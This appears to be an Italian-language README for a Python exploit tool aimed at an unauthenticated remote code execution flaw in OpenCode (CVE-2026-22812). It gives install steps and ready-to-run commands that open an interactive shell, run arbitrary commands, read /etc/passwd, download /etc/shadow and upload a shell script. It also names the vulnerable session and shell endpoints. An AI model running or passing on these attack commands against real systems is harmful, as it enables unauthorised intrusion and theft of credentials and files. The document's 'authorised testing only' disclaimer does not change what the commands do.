
Strumento di exploit in Python per OpenCode RCE (CVE-2026-22812) che fornisce esecuzione di comandi, lettura/scrittura/caricamento/scaricamento di file e shell interattiva per test di penetrazione autorizzati.
Uno strumento di sfruttamento in Python per la vulnerabilità di Remote Code Execution (RCE) di OpenCode che interessa le versioni < v1.0.216. Questo strumento fornisce molteplici vettori di attacco, tra cui esecuzione di comandi, lettura/scrittura di file, caricamento/scaricamento di file e shell interattiva.
⚠️ SOLO PER TEST AUTORIZZATI ⚠️
# Clona il repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812
# Installa le dipendenze
pip install requests urllib3
# Rendi eseguibile (opzionale)
chmod +x CVE-2026-22812.py
requestsurllib3python3 CVE-2026-22812.py -t http://target:port [options]
# Verifica se il target è vulnerabile
python3 exploit.py -t http://10.0.0.1:4096 --check
# Shell interattiva
python3 exploit.py -t http://10.0.0.1:4096 -i
# Esegui un singolo comando
python3 exploit.py -t http://10.0.0.1:4096 -c "id"
# Leggi un file
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd
# Carica un file
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh
# Scarica un file
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt
# Ottieni informazioni sul sistema
python3 exploit.py -t http://10.0.0.1:4096 --info
# Usa un proxy (Burp Suite, ecc.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080
Una volta nella shell interattiva (flag -i), puoi utilizzare:
<comando> Esegui comando shell
help Mostra menu di aiuto
exit Esci dalla shell
session Mostra ID sessione
stats Mostra statistiche di sfruttamento
read <file> Leggi contenuto file
download <remoto> <locale> Scarica file
upload <locale> <remoto> Carica file
sysinfo Ottieni informazioni sul sistema
La vulnerabilità esiste nell'endpoint di gestione delle sessioni (/session) che consente a utenti non autenticati di creare sessioni ed eseguire comandi arbitrari tramite l'endpoint /session/{id}/shell.
POST /session - Crea sessionePOST /session/{id}/shell - Esegue comandiGET /file/content - Legge fileCVE-2026-22812.py
├── Classe Colors (codici colore ANSI)
├── print_banner() (Mostra banner)
├── Classe Exploit (Logica principale dello sfruttamento)
│ ├── __init__() (Inizializzazione)
│ ├── check_vuln() (Verifica vulnerabilità)
│ ├── create_session() (Crea sessione)
│ ├── exec_cmd() (Esegui comando)
│ ├── read_file() (Leggi file)
│ ├── write_file() (Scrivi file)
│ ├── upload() (Carica file)
│ ├── download() (Scarica file)
│ ├── get_info() (Info sistema)
│ ├── shell() (Shell interattiva)
│ └── Metodi helper
└── main() (Parsing argomenti)
Questo strumento è rilasciato esclusivamente a scopo educativo. Utilizzalo a tuo rischio.
Per problemi e domande, ti preghiamo di: